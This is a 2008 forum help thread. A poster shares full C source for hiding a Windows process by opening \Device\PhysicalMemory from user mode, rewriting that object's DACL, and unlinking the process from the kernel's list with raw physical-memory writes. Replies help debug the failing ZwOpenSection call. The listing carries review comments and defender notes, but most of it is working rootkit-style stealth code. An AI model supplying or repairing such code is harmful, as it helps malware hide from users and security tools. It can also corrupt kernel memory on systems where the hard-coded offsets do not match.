
[求助]ZwOpenSection失败

2008-3-30 21:09
10044
偶最近看到一段隐藏进程的代码
是MFC的程序 由于没学MFC
于是把它改成Console的

ZwOpenSection总是返回失败
理论上应该返回STATUS_ACCESS_DENIED才对
实在是不解 还望赐教

方法是前人用烂的摘链法
代码如下
#include <stdio.h>
//#include <windows.h>
#include <aclapi.h>

/* Local stand-ins for native (ntdll) types and status codes. <windows.h> is
 * commented out above and no NT headers are included, so the program declares
 * the pieces of the native API it needs by hand and resolves the functions
 * from ntdll.dll at run time (see OpenPhyMemObject). */
typedef LONG NTSTATUS;

/* NT convention: a status is a success when its sign bit is clear. */
#define NT_SUCCESS(Status)			((NTSTATUS)(Status) >= 0)
/* Declared but not referenced anywhere in this listing. */
#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L)
/* The status OpenPhyMemObject tests for before it tries to widen the DACL. */
#define STATUS_ACCESS_DENIED		((NTSTATUS)0xC0000022L)

/* Counted (not NUL-terminated) wide string, as used by the native API.
 * Length/MaximumLength are in bytes. */
typedef struct _UNICODE_STRING 
{
    USHORT Length;
    USHORT MaximumLength;
    PWSTR Buffer;
} UNICODE_STRING, *PUNICODE_STRING;

/* Object name + open options passed to Zw/NtOpen* routines.
 * Length must be sizeof(OBJECT_ATTRIBUTES); the rest is filled in by
 * OpenPhyMemObject. */
typedef struct _OBJECT_ATTRIBUTES 
{ 
	ULONG Length; 
	HANDLE RootDirectory; 
	PUNICODE_STRING ObjectName; 
	ULONG Attributes; 
	PVOID SecurityDescriptor; 
	PVOID SecurityQualityOfService; 
} OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES; 

/* Pointer type for the ntdll export "ZwOpenSection": opens an existing
 * section object by name with the requested access mask. */
typedef NTSTATUS (CALLBACK* ZWOPENSECTION)(
    OUT PHANDLE SectionHandle,
    IN ACCESS_MASK DesiredAccess,

    IN POBJECT_ATTRIBUTES ObjectAttributes
    );

/* Pointer type for the ntdll export "RtlInitUnicodeString": points a
 * UNICODE_STRING at a NUL-terminated wide string (no copy is made, so the
 * source buffer must outlive the UNICODE_STRING). */
typedef VOID (CALLBACK* RTLINITUNICODESTRING)(
    IN OUT PUNICODE_STRING DestinationString,
    IN PCWSTR SourceString
    );

/* Program state shared by the routines below.
 *  ishide          - set/cleared only in main() after hideprocess() reports
 *                    success; read by hideprocess() and main().
 *  hSection        - handle to the physical-memory section opened in
 *                    OpenPhyMemObject(); every MapViewOfFile below maps it.
 *  mapPhyMemObject - view of the 4 KB page at physical address PhyDirAddress,
 *                    used as the page-directory base by GetData()/SetData().
 * Neither handle nor view is ever closed/unmapped in this listing.
 *
 * Defender note: a user-mode process opening the physical-memory section with
 * SECTION_MAP_WRITE, or rewriting its DACL, is a strong indicator on systems
 * that still expose the object and is worth auditing (object-access auditing
 * with a SACL on the object records both). */
static bool ishide = false;
HANDLE hSection = NULL;
PVOID mapPhyMemObject = NULL;

/*
 * Translate a 32-bit virtual address to a physical address by walking the
 * page tables by hand through the physical-memory section (hSection).
 *
 *   Base    - mapped view of the page directory (mapPhyMemObject); indexed
 *             with the top 10 bits of the address.
 *   address - virtual address to translate.
 * Returns the physical address, or 0 when the PDE or PTE has the present bit
 * (bit 0) clear.
 *
 * The 10/10/12 split used here (VAddress>>22, bits 12..21, low 12 bits) is
 * the non-PAE x86 layout; a PAE kernel has an extra level this walk does not
 * handle -- reviewer's assumption, not stated by the author. Addresses are
 * carried in ULONG, so this only holds in a 32-bit process.
 */
PVOID LinerAddressToPhysicAddress(PULONG Base, PVOID address)
{
	ULONG VAddress = (ULONG)address;
	ULONG PDE,PTE,PAddress;
	PDE = Base[VAddress>>22];
	if((PDE&1)==0)
		return 0;
	ULONG PageFlage = PDE&0x00000080;
	if (PageFlage != 0)
	{
		// PS bit set: 4 MB page, the PDE holds the frame directly
		// (top 10 bits) and the low 22 bits of the address are the offset.
		PAddress = (PDE&0xffc00000) + (VAddress&0x003fffff);
	}
	else
	{
		// PS bit clear: 4 KB paging. Map the page table the PDE points to
		// (access 4 == FILE_MAP_READ) and fetch the PTE selected by bits 12..21.
		// The MapViewOfFile result is not checked before it is indexed on the
		// next line; a failed mapping would fault here.
		PDE = (ULONG)MapViewOfFile(hSection,4,0,PDE&0xfffff000,0x1000);
		PTE = ((PULONG)PDE)[(VAddress&0x003ff000)>>12];
		if((PTE&1) == 0)
			return 0;	// not present -- note the mapped view is not unmapped on this path
		PAddress = (PTE&0xfffff000)+(VAddress&0x00000fff);
		UnmapViewOfFile((PVOID)PDE);
	}
	return (PVOID)PAddress;
}

/*
 * Read one ULONG from virtual address addr by going through physical memory
 * rather than dereferencing it in this process.
 *
 * Steps: translate addr via the page-directory view (mapPhyMemObject), map
 * the 4 KB physical page containing it, read the dword at the page offset,
 * unmap.
 *
 * Returns 0 both when the mapping fails and when the stored value is 0, so
 * callers cannot tell the two apart. A translation failure is not detected
 * either: when LinerAddressToPhysicAddress returns 0, phys&0xfffff000 is 0
 * and physical page 0 is mapped and read instead of bailing out.
 */
ULONG GetData(PVOID addr)
{
	ULONG phys = (ULONG)LinerAddressToPhysicAddress((PULONG)mapPhyMemObject,(PVOID)addr);
	/* write access is requested although this routine only reads */
	PULONG tmp = (PULONG)MapViewOfFile(hSection,FILE_MAP_READ|FILE_MAP_WRITE,0,phys&0xfffff000,0x1000);
	if(tmp == 0)
		return 0;
	ULONG ret = tmp[(phys&0xfff)>>2];	/* dword index = byte offset within the page / 4 */
	UnmapViewOfFile(tmp);
	return ret;
}

/*
 * Write one ULONG to virtual address addr through physical memory.
 * Same translate/map/unmap sequence as GetData; the target page is mapped
 * with FILE_MAP_WRITE only.
 *
 * Returns false when the page could not be mapped, TRUE otherwise (the two
 * literals mix bool and BOOL; both convert to the declared BOOL return).
 * As in GetData, a translation result of 0 is not treated as an error, so a
 * non-present address ends up writing into physical page 0.
 *
 * This is the primitive that modifies kernel data structures from user mode
 * (see hideprocess) -- the security-relevant write of the whole program.
 */
BOOL SetData(PVOID addr, ULONG data)
{
	ULONG phys = (ULONG)LinerAddressToPhysicAddress((PULONG)mapPhyMemObject,(PVOID)addr);
	PULONG tmp = (PULONG)MapViewOfFile(hSection,FILE_MAP_WRITE,0,phys&0xfffff000,0x1000);
	if(tmp == 0)
		return false;
	tmp[(phys&0xfff)>>2] = data;	/* dword index = byte offset within the page / 4 */
	UnmapViewOfFile(tmp);
	return TRUE;
}

/*
 * Grant the calling user SECTION_MAP_WRITE on the section behind hSec by
 * adding an access-allowed ACE to the object's DACL.
 *
 *   hSec - section handle; OpenPhyMemObject passes one opened with
 *          READ_CONTROL|WRITE_DAC.
 *
 * Flow: GetSecurityInfo reads the current DACL (pDacl points into the
 * returned pSD, which is why only pSD is freed), SetEntriesInAcl merges one
 * EXPLICIT_ACCESS entry for the special trustee name "CURRENT_USER" into a
 * new DACL, and SetSecurityInfo writes that DACL back to the object.
 *
 * None of the three Win32 calls has its return value checked. If
 * SetEntriesInAcl fails, pNewDacl stays NULL and SetSecurityInfo is still
 * called with it; nothing here reports failure to the caller.
 *
 * Defender note: a DACL change on a kernel object is itself a high-value
 * audit event; object-access auditing (SACL) on the object records it.
 */
void AddACEtoPhyMemObject(HANDLE hSec)
{
	PACL pDacl = NULL;
	PSECURITY_DESCRIPTOR pSD = NULL;
	PACL pNewDacl = NULL;
	GetSecurityInfo(hSec,
					SE_KERNEL_OBJECT,
					DACL_SECURITY_INFORMATION,
					NULL,
					NULL,
					&pDacl,
					NULL,
					&pSD);
	
	/* One explicit ACE: allow SECTION_MAP_WRITE for the current user. */
	EXPLICIT_ACCESS ea;
	RtlZeroMemory(&ea, sizeof(EXPLICIT_ACCESS));
	ea.grfAccessPermissions = SECTION_MAP_WRITE; 
    ea.grfAccessMode = GRANT_ACCESS; 
    ea.grfInheritance= NO_INHERITANCE; 
    ea.Trustee.TrusteeForm = TRUSTEE_IS_NAME; 
    ea.Trustee.TrusteeType = TRUSTEE_IS_USER; 
    ea.Trustee.ptstrName = "CURRENT_USER"; 

    /* Merge the new entry with the existing DACL into pNewDacl (return value unchecked). */
    SetEntriesInAcl(1,&ea,pDacl,&pNewDacl);
    
    /* Apply the new DACL to the object (return value unchecked). */
    SetSecurityInfo(hSec,
					SE_KERNEL_OBJECT,
					DACL_SECURITY_INFORMATION,
					NULL,
					NULL,
					pNewDacl,
					NULL);

    if(pSD) 
        LocalFree(pSD); 
    if(pNewDacl) 
        LocalFree(pNewDacl); 
}

/*
 * Open the physical-memory section object and map the page directory.
 *
 * Resolves RtlInitUnicodeString and ZwOpenSection from ntdll at run time,
 * fills an OBJECT_ATTRIBUTES for the name placed in PhyMemObjectString and
 * opens the section for SECTION_MAP_READ|SECTION_MAP_WRITE. Only if that
 * returns exactly STATUS_ACCESS_DENIED does it reopen the object with
 * READ_CONTROL|WRITE_DAC, widen the DACL via AddACEtoPhyMemObject, and retry
 * the map-read/write open; any other failure status falls through to the
 * "opensection failed" path.
 *
 * On success the page at physical address PhyDirAddress (0x39000, a value
 * the author hard-codes as the page-directory base for their machine) is
 * mapped into the global mapPhyMemObject, the handle is stored in the global
 * hSection and returned. Returns NULL on failure.
 *
 * Review observations (code left as posted):
 *  - On the retry path the READ_CONTROL|WRITE_DAC handle stored in hSection
 *    is overwritten by the next ZwOpenSection without CloseHandle, so it
 *    leaks (reply #4 in the thread raises the same point).
 *  - LoadLibrary, both GetProcAddress results and the final MapViewOfFile
 *    are used without being checked.
 *  - Every call opens a new handle and a new view; the previous ones are
 *    never released (hideprocess calls this on each invocation).
 *  - Defender note: newer Windows releases no longer allow user-mode access
 *    to this object at all -- NOTE(review): confirm against the target OS.
 */
HANDLE OpenPhyMemObject()
{
	NTSTATUS status;
	UNICODE_STRING PhyMemObjectString;
	OBJECT_ATTRIBUTES attributes;
	ULONG PhyDirAddress = 0x39000;	/* hard-coded page-directory physical address */
	
	HMODULE hNtdll = LoadLibrary("ntdll.dll");
	RTLINITUNICODESTRING RtlInitUnicodeString = 
		(RTLINITUNICODESTRING)GetProcAddress(hNtdll,"RtlInitUnicodeString");
	RtlInitUnicodeString(&PhyMemObjectString,L"Device\\PhysicalMemory");

	/* Plain open by name: no root directory, no attributes, default security. */
	attributes.Length = sizeof(OBJECT_ATTRIBUTES);
	attributes.RootDirectory = NULL;
	attributes.ObjectName = &PhyMemObjectString;
	attributes.Attributes = 0;
	attributes.SecurityDescriptor = NULL;
	attributes.SecurityQualityOfService = NULL;

	ZWOPENSECTION ZwOpenSection = 
		(ZWOPENSECTION)GetProcAddress(hNtdll, "ZwOpenSection");

	status = ZwOpenSection(&hSection,SECTION_MAP_READ|SECTION_MAP_WRITE,&attributes);
	if(status == STATUS_ACCESS_DENIED)
	{
		/* Reopen with just enough access to edit the DACL, add the ACE, retry.
		 * The handle obtained here is overwritten below without being closed. */
		status = ZwOpenSection(&hSection,READ_CONTROL|WRITE_DAC,&attributes);
		AddACEtoPhyMemObject(hSection);
		status = ZwOpenSection(&hSection,SECTION_MAP_READ|SECTION_MAP_WRITE,&attributes);
	}
	if(!NT_SUCCESS(status))
	{
		printf("opensection failed.\n");
		return NULL;
	}

	/* Map the page directory page; result not checked. */
	mapPhyMemObject = MapViewOfFile(hSection,FILE_MAP_READ|FILE_MAP_WRITE,0,PhyDirAddress,0x1000);
	FreeLibrary(hNtdll);
	return hSection;
}

/*
 * Hide (or, nominally, unhide) the current process by unlinking its process
 * object from a kernel doubly-linked list using raw physical-memory writes
 * -- direct kernel object manipulation from user mode.
 *
 *   hide - true to unlink, false to relink.
 * Returns false only when OpenPhyMemObject fails; otherwise true, whether or
 * not anything was written.
 *
 * Every address in the walk is a hard-coded constant the author took from
 * one particular 32-bit kernel build; none is derived at run time:
 *   0xffdff124     - read as the current thread pointer
 *   thread  + 0x44 - read as the owning process
 *   process + 0x88 - list Flink, process + 0x8c - list Blink
 * NOTE(review): on any other build these reads return unrelated data and the
 * SetData calls corrupt arbitrary kernel memory.
 *
 * Unlink: the next entry's Blink (flink+4) is pointed at blink and the
 * previous entry's Flink (blink+0) at flink; the process's own link fields
 * are left untouched.
 *
 * The unhide branch is empty, yet the function still returns true, so main()
 * prints "unhide successfully" and clears ishide with nothing relinked.
 *
 * Defender note: an unlinked entry only disappears from list-walking
 * enumeration; the object itself still exists, which is why cross-view
 * comparison of the process list against other kernel views is the standard
 * way to expose this class of hiding.
 */
bool hideprocess(bool hide)
{
	/* Opens a fresh section handle and page-directory view on every call. */
	if(!OpenPhyMemObject())
	{
		printf("open physical memory failed.\n");
		return false;
	}
	ULONG thread = GetData((PVOID)0xffdff124);
	ULONG process = GetData((PVOID)(thread + 0x44));
	ULONG flink = GetData((PVOID)(process + 0x88));
	ULONG blink = GetData((PVOID)(process + 0x8c));
	
	if(hide == true && ishide == false)
	{
		/* next->Blink = blink ; prev->Flink = flink ; return values ignored */
		SetData((PVOID)(flink + 4),blink);
		SetData((PVOID)(blink),flink);
	}
	if(hide == false && ishide == true)
	{
		//unhide()  -- not implemented; see header comment
	}
	return true;
}

/*
 * Interactive console driver: reads one command character per line and
 * dispatches on it.
 *   'h' - hide   (refused with a message if ishide is already set)
 *   'u' - unhide (refused with a message if ishide is not set)
 *   'e' - leave the loop and return 0
 * Anything else prints "unknown command".
 *
 * The second getchar() discards the newline left behind by the first.
 * ishide is changed only here, after hideprocess reports success. Because
 * hideprocess(false) currently does no work but still returns true, the 'u'
 * path clears the flag and reports success without restoring anything (see
 * hideprocess). bRet is declared uninitialized but assigned before each use.
 */
int main()
{
	char ch;
	bool bExit = false;
	bool bRet;

	while(!bExit)
	{
		printf("h to hide\nu to unhide\ne to exit\n");
		ch = getchar();
		getchar();	/* swallow the trailing newline */
		switch(ch)
		{
		case 'h':
			if(ishide == true)
			{
				printf("the process is already hiden.\n");
				break;
			}
			bRet = hideprocess(true);
			if(bRet)
			{
				printf("hide successfully.\n");
				ishide = true;
			}
			else
				printf("hide failed.\n");
			break;
		case 'u':
			if(ishide == false)
			{
				printf("the process is not hiden.\n");
				break;
			}
			bRet = hideprocess(false);	/* no-op today; see hideprocess */
			if(bRet)
			{
				printf("unhide successfully.\n");
				ishide = false;
			}
			else
				printf("unhide failed.\n");
			break;
		case 'e':
			bExit = true;
			break;
		default:
			printf("unknown command.\n");
			break;
		}
	}

	return 0;
}


最新回复 (3)
2
OpenPhyMemObject应该调用2次,否则不能访问系统高2GB空间

你再调试下
2008-3-30 21:36
3
调试结果是调用两次还是一样的
关键问题在这里
status = ZwOpenSection(&hSection,SECTION_MAP_READ|SECTION_MAP_WRITE,&attributes);
  if(status == STATUS_ACCESS_DENIED)
  {
    status = ZwOpenSection(&hSection,READ_CONTROL|WRITE_DAC,&attributes);
    AddACEtoPhyMemObject(hSection);
    status = ZwOpenSection(&hSection,SECTION_MAP_READ|SECTION_MAP_WRITE,&attributes);
  }

ZwOpenSection没有返回STATUS_ACCESS_DENIED
ACE也不用加了 直接就失败了 ~~~
2008-3-30 22:00
4
有一句疏漏。
status = ZwOpenSection(&hSection,SECTION_MAP_READ|SECTION_MAP_WRITE,&attributes);
  if(status == STATUS_ACCESS_DENIED)
  {
    status = ZwOpenSection(&hSection,READ_CONTROL|WRITE_DAC,&attributes);
    AddACEtoPhyMemObject(hSection);
    status = ZwOpenSection(&hSection,SECTION_MAP_READ|SECTION_MAP_WRITE,&attributes);
  }

在第二次调用ZwOpenSection之前加上一句
CloseHandle(hSection);
2008-3-30 22:33